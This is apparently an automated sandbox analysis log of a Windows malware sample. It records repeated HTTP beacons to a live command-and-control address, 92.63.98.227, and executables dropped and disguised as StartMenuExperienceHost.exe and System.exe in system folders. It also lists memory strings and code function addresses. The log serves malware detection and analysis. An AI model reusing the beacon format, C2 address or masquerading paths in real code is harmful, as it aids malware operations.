            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000273A000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.0000000002791000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.0000000003116000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.63.98.227
            Source: StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000277A000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.0000000002791000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.0000000003116000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.63.98.227(
            Source: xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Unive
            Source: xMLVfJVxhYAkoCJ.exe, 00000022.00000002.2260234358.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic5
            Source: XPC5PMKegV.exe, 00000000.00000002.2128952828.0000000003169000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000273A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exeJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe\:Zone.Identifier:$DATAJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Windows\IdentityCRL\production\51c080b3bf3cc1Jump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeCode function: 0_2_00007FFD347935650_2_00007FFD34793565
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeCode function: 0_2_00007FFD3479CAA90_2_00007FFD3479CAA9
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeCode function: 5_2_00007FFD347735655_2_00007FFD34773565
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeCode function: 5_2_00007FFD3477CAA95_2_00007FFD3477CAA9
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeCode function: 5_2_00007FFD3477CF285_2_00007FFD3477CF28
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 29_2_00007FFD3476356529_2_00007FFD34763565
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 29_2_00007FFD3476CAA929_2_00007FFD3476CAA9
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 30_2_00007FFD3477356530_2_00007FFD34773565
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 30_2_00007FFD3477CAA930_2_00007FFD3477CAA9
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 30_2_00007FFD3477CF2830_2_00007FFD3477CF28
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 30_2_00007FFD34785BD330_2_00007FFD34785BD3
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 31_2_00007FFD347A5BD331_2_00007FFD347A5BD3
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 31_2_00007FFD3479356531_2_00007FFD34793565
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 31_2_00007FFD3479CFCF31_2_00007FFD3479CFCF
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347A2C6032_2_00007FFD347A2C60
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347ABD8B32_2_00007FFD347ABD8B
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347A102F32_2_00007FFD347A102F
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347B27A032_2_00007FFD347B27A0
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347AC92032_2_00007FFD347AC920
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347AD12032_2_00007FFD347AD120
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347A335032_2_00007FFD347A3350
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347ADBA832_2_00007FFD347ADBA8
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347AC73732_2_00007FFD347AC737
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347B273032_2_00007FFD347B2730
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347AB03132_2_00007FFD347AB031
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347AB01032_2_00007FFD347AB010
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 32_2_00007FFD347AC27032_2_00007FFD347AC270
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 33_2_00007FFD3477356533_2_00007FFD34773565
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 33_2_00007FFD3477CAA933_2_00007FFD3477CAA9
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 33_2_00007FFD3477CF2833_2_00007FFD3477CF28
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 33_2_00007FFD34785BD333_2_00007FFD34785BD3
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 34_2_00007FFD3478356534_2_00007FFD34783565
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 34_2_00007FFD3478CAA934_2_00007FFD3478CAA9
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 34_2_00007FFD3478CF3834_2_00007FFD3478CF38
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 35_2_00007FFD3478356535_2_00007FFD34783565
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 35_2_00007FFD3478CAA935_2_00007FFD3478CAA9
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 35_2_00007FFD3478CF3835_2_00007FFD3478CF38
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 35_2_00007FFD34795BD335_2_00007FFD34795BD3
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347B267838_2_00007FFD347B2678
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347C103038_2_00007FFD347C1030
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347B1F8B38_2_00007FFD347B1F8B
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347CAF9238_2_00007FFD347CAF92
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347B70B038_2_00007FFD347B70B0
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347B516D38_2_00007FFD347B516D
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347CA25D38_2_00007FFD347CA25D
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347B62C138_2_00007FFD347B62C1
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347BC3FB38_2_00007FFD347BC3FB
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347B3B6838_2_00007FFD347B3B68
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347C7EDD38_2_00007FFD347C7EDD
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347B46D838_2_00007FFD347B46D8
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347B484938_2_00007FFD347B4849
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347B0AF538_2_00007FFD347B0AF5
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347A356538_2_00007FFD347A3565
